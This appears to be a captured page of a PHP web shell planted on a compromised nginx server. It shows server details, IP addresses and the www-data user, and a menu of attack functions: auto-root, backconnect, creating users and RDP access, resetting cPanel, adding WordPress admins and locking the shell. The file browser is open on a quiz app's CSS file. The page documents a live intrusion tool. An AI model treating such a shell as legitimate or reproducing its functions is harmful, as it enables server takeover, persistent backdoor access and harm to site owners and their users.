Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
src /
components /
[ HOME SHELL ]
Name
Size
Permission
Action
Question.css
984
B
-rw-rw-rw-
Question.tsx
1.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Question.css
/* Base Styling for Question Component */ .number { font-size: 1.2rem; font-weight: bold; color: #2c3e50; margin-bottom: 10px; text-align: center; } .option { display: inline-block; background-color: #3498db; color: #fff; border: none; padding: 12px 25px; border-radius: 8px; font-size: 1rem; cursor: pointer; transition: transform 0.2s ease, background-color 0.3s ease; margin-top: 20px; } button:disabled { background-color: #ababab; color: white; cursor: not-allowed; } button:disabled:hover { background-color: #ababab; } /* Responsive Design */ @media (max-width: 768px) { .number { font-size: 1rem; } p { font-size: 1rem; } button { font-size: 0.9rem; padding: 8px 12px; } } @media (max-width: 480px) { .number { font-size: 0.9rem; } p { font-size: 0.9rem; } button { font-size: 0.85rem; padding: 8px 10px; } }
Close